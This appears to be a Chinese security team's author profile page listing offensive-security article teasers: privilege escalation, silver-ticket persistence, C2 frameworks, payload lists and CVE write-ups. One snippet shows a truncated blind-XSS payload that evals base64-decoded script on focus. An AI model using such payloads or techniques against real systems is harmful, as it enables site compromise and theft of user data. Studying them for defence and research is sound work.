学习
实践
活动
专区
工具
TVP
写文章

Khan安全团队

LV6
举报
发表了文章

Google Chrome CVE-2022-3656 漏洞

Imperva Red Team 最近披露了一个名为 CVE-2022-3656 的漏洞,该漏洞影响超过 25 亿 Google Chrome 和基于 Chro...

Khan安全团队
安全httpsHTTP网络安全
发表了文章

【云安全最佳实践】基础防护建设

做好基线核查和加固是安全管理工作中的基础工作,但却与安全事件密切相关。例如系统账号登录策略未做好合规要求,黑客就可以通过弱口令、默认口令等方式登录系统。但如果做...

Khan安全团队
黑客网络安全安全移动应用安全漏洞扫描
发表了文章

bypass payload list

Khan安全团队
发表了文章

红队利器 - SharpSniper

通常,红队参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。

Khan安全团队
PythonTCP/IP
发表了文章

从 RPC 到 RCE - 通过 RBCD 和 MS-RPC 接管工作站

在 Active Directory 的默认配置中,可以在其 WebClient 服务运行时远程接管工作站 (Windows 7/10/11) 和可能的服务器(...

Khan安全团队
网站RPCHTTP网络安全安全
发表了文章

域持久性:银票攻击

白银票证是针对特定服务的伪造服务或 TGS 票证,可用于在与 Active Directory 企业域连接的受感染系统上保持持久性。在攻击中,攻击者...

Khan安全团队
编程算法网络安全安全SQL
发表了文章

5000字解析:实战化场景下的容器安全攻防之道

在这个数字化转型关键时期,以容器为代表的云原生技术凭借自身的优势,正在逐渐成为核心IT基础设施。云原生已经不再是少部分“创新者”的特权,而是成为了市场主流选择,...

Khan安全团队
容器网络安全安全应急响应API
发表了文章

DOMDig - 用于单页应用程序的 DOM XSS 扫描器

DOMDig 是一个运行在 Chromium 网络浏览器中的 DOM XSS 扫描器,它可以递归地扫描单页应用程序 (SPA)。

Khan安全团队
JSONXML网络安全爬虫编程算法
发表了文章

Atlassian Confluence 蜜罐 (CVE-2022-26134)

ConfluencePot 是针对 Atlassian Confluence 未经身份验证和远程 OGNL 注入漏洞 ( CVE-2022-26...

Khan安全团队
https网络安全
发表了文章

神兵利器 - SharpEventPersist

shellcode 转换为十六进制并写入“密钥管理服务”,事件级别设置为“信息”,源为“持久性”。 运行 SharpEv...

Khan安全团队
发表了文章

红队提权 - 可写系统路径权限提升

这些问题的根本原因来自常见的系统配置错误,这使得识别和利用这些问题非常可靠。相比之下,传统的基于内存损坏的本地权限提升漏洞通常需要固定偏移量,具...

Khan安全团队
Windows网络安全安全Windows Server
发表了文章

红队提权 - 基于RBCD的提权

在这种情况下,我们利用这样一个事实,即从非特权用户上下文中,我们可以诱导以 NT AUTHORITY\SYSTEM 身份运行的本地服务通过 HT...

Khan安全团队
WindowsWindows Server
发表了文章

CVE-2022-23222:Linux 内核 eBPF 本地权限提升

https://github.com/tr3ee/CVE-2022-23222 近期在对Linux eBPF进行代码审计的过程中,发现了一枚权限提升漏洞...

Khan安全团队
单片机安全httpsGitHubLinux
发表了文章

快速 CRLF 注入扫描工具

CRLFsuite 是一款专为扫描而设计的快速工具CRLF injection

Khan安全团队
HTTP
发表了文章

神兵利器 - C2框架Atlas

生成client、teamserver、implant的exe后,直接执行Teamserver.exe即可启动teamserver

Khan安全团队
ShellPowerShell命令行工具
发表了文章

一些用于查找敏感文件的语法

Khan安全团队
发表了文章

Blind XSS

"><input onfocus=eval(atob(http://this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlb...

Khan安全团队
发表了文章

Top25漏洞常见参数

基础研究,参考各种文章,使用频率前 25 位的。这些参数可用于工具或手动使用的参数。

Khan安全团队
发表了文章

Sql-injection-Payload

Khan安全团队
SQL网络安全
发表了文章

通过CdpSvc服务提升Windows本地权限

它运行NT AUTHORITY\LOCAL SERVICE并尝试在启动时通过调用加载缺少的cdpsgshims.dllLoadLibrary() DLL ,而不...

Khan安全团队
命令行工具数据分析

个人简介

个人成就

扫码关注腾讯云开发者

领取腾讯云代金券